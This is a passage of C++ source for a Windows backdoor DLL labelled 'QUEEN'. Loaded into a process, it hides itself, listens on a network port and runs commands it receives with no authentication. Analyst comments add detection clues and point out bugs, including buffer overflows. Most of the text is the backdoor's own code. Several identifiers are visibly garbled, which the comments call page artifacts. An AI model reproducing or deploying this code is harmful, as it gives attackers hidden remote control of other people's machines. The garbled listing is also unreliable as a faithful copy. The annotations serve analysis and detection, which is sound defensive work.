}
else if(listen(createSock,3)==SOCKET_ERROR)
{
closesocket(createSock);
MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK);
return FALSE;
}
else
if(WSAAsyncselect(createSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_
ERROR)
{
closesocket(createSock);
MessageBox(hWnd,"WSAselect ERROR",NULL,MB_OK);
return FALSE;
}
// Length argument later passed to accept() in WndProc.
addrlen=sizeof(SOCKADDR_IN);

return TRUE;
}
//---------------------------------------------------------------------------
// Window procedure of the hidden window; it doubles as the socket event loop.
//   WM_SOCKET / FD_ACCEPT - accepts the connection into NewSock, registers it for
//                           read/write/close events and sends the banner plus PROMPT
//   WM_SOCKET / FD_READ   - reads up to dwComm bytes; input starting with VK_RETURN
//                           runs the accumulated line through ExeCommand, anything
//                           else is appended to szExec; the buffer is then echoed
//   WM_SOCKET / FD_CLOSE  - closes the socket carried in wParam
//   WM_DESTROY            - calls HideProc(UNSERVICE_PROC) and posts the quit message
// Everything else goes to DefWindowProc. Returns 0 for handled messages.
// Analyst note: nothing between accept() and ExeCommand() checks who the peer is or
// asks for a credential; whatever arrives on the port is accumulated and dispatched.
// The banner text built below is sent to every new connection and is a content
// indicator for traffic on PORT.
// NOTE(review): recv() may fill all dwComm bytes of szCommand, leaving it without a
// terminator, and lstrcat appends to the dwComm-sized static szExec with no bound, so
// input from the network can write past both buffers. The recv() result is not
// checked.
// NOTE(review): each send() transmits a fixed dwComm bytes regardless of the length of
// the text in the buffer.
// NOTE(review): WSAAsyncselect, WSAGETselectERROR and WSAGETselectEVENT are spelled
// with a lowercase "select" here -- page artifact, confirm against a clean copy.
extern "C" __declspec(dllexport)
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM
lParam)
{
static TCHAR szCommand[dwComm];
static TCHAR szExec[dwComm];
switch(message)
{
case WM_SOCKET:
if(WSAGETselectERROR(lParam))
{
closesocket(wParam);
break;
}
switch(WSAGETselectEVENT(lParam))
{
file:// connection
case FD_ACCEPT:
NewSock=accept(createSock,(LPSOCKADDR)&NewSock_in,&addrlen);

WSAAsyncselect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
wsprintf(szCommand,"QUEEN Ver 0.5beat Write by
NOIR\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
break;
file:// read the input; if it is a carriage return, execute the command
file:// otherwise copy the input into the buffer
case FD_READ:
ZeroMemory(szCommand,dwComm);
recv(NewSock,szCommand,dwComm,0);
if(szCommand[0]==VK_RETURN)
{
wsprintf(szCommand,"\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
ExeCommand(szExec,hWnd);
ZeroMemory(szExec,dwComm);
}
else
lstrcat(szExec,szCommand);
// Not part of the else above: this send runs on both paths.
send(NewSock,szCommand,dwComm,0);
break;
case FD_CLOSE:
closesocket(wParam);
break;
}
break;
case WM_DESTROY:
HideProc(UNSERVICE_PROC);
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
//---------------------------------------------------------------------------
// Main routine of the listener: registers the window class "QUEEN", creates a window
// titled "QUEENServer", hides it with SW_HIDE, calls HideProc(SERVICE_PROC) when
// GetOS() reports the Windows 9x platform, starts the listener through InitSocket and
// then pumps messages until GetMessage returns 0. Returns msg.wParam.
// In this listing it is called from start(), not by the C runtime; none of the four
// parameters is named or used.
// Analyst note: the class name and window title are literal strings, and the window
// is never shown, so window enumeration that includes hidden windows is one way to
// spot the process.
// NOTE(review): the two source comments near the end announce copying the file into
// the system directory and a registry autorun entry, but no code for either step is
// present; hKey, disp, lResult, szKey, szSysDir and szFileName are declared and never
// used. Treat persistence as something to check for on a host, not as behaviour
// demonstrated by this listing.
// NOTE(review): the results of RegisterClass, the window-creation call and InitSocket
// are not checked, and the declaration carries no return type. createWindow and
// updateWindow are spelled with a lowercase first letter here (page artifact).
extern "C" __declspec(dllexport)
WINAPI WinMain(HINSTANCE , HINSTANCE, LPSTR, int)
{
HWND hWnd;
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="QUEEN";
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25];
TCHAR szFileName[MAX_PATH];

wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=createWindow(szAppName,"QUEENServer",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
// The window exists only to receive WM_SOCKET messages; it is never displayed.
ShowWindow(hWnd,SW_HIDE);
updateWindow(hWnd);
if(GetOS()==VER_PLATFORM_WIN32_WINDOWS)
{
HideProc(SERVICE_PROC);
}
InitSocket(hWnd);
file:// copy the file into the system directory
file:// and load the registry so it runs automatically

while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (msg.wParam);
}
//---------------------------------------------------------------------------
// Thread entry point created by DllMain: fetches the process command line and calls
// WinMain, which runs the listener's message loop on this thread.
// NOTE(review): GetCurrentProcess() returns a process handle, which is passed where
// WinMain's first parameter expects an instance handle; WinMain ignores it.
// NOTE(review): the function is declared to return DWORD but has no return statement.
DWORD WINAPI start(LPVOID not)
{
HANDLE hinst=GetCurrentProcess();//or use HMODULE GetModuleHandle()
LPSTR lpCmdLine=GetCommandLine();
WinMain(hinst,//handle of the current instance
NULL,//always NULL
lpCmdLine,//command-line arguments, obtained from GetCommandLine()
SW_SHOW);//window show mode
}
//---------------------------------------------------------------------------
// DLL entry point. On DLL_PROCESS_ATTACH it creates a thread that runs start(); every
// other notification is ignored. Always returns TRUE.
// Analyst note: because the work starts from the attach notification, the listener
// runs inside whichever process loads this DLL. Triage should therefore inspect the
// loaded-module list of the process that owns the listening socket, not only process
// names.
// NOTE(review): createThread is spelled with a lowercase first letter here (page
// artifact, presumably CreateThread).
// NOTE(review): szprocessid is allocated on every call and never used or freed, the
// thread handle is never closed, and the second return statement is unreachable.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdreason, LPVOID
lpvReserved)
{ char *szprocessid=new char[10];
DWORD hthreadid;
HANDLE hthread;
switch(fwdreason)
{
case DLL_PROCESS_ATTACH:
hthread=createThread(NULL,0,start,(LPVOID)1,0,&hthreadid);
break;
default:
break;
}
return(TRUE);
return 1;
}
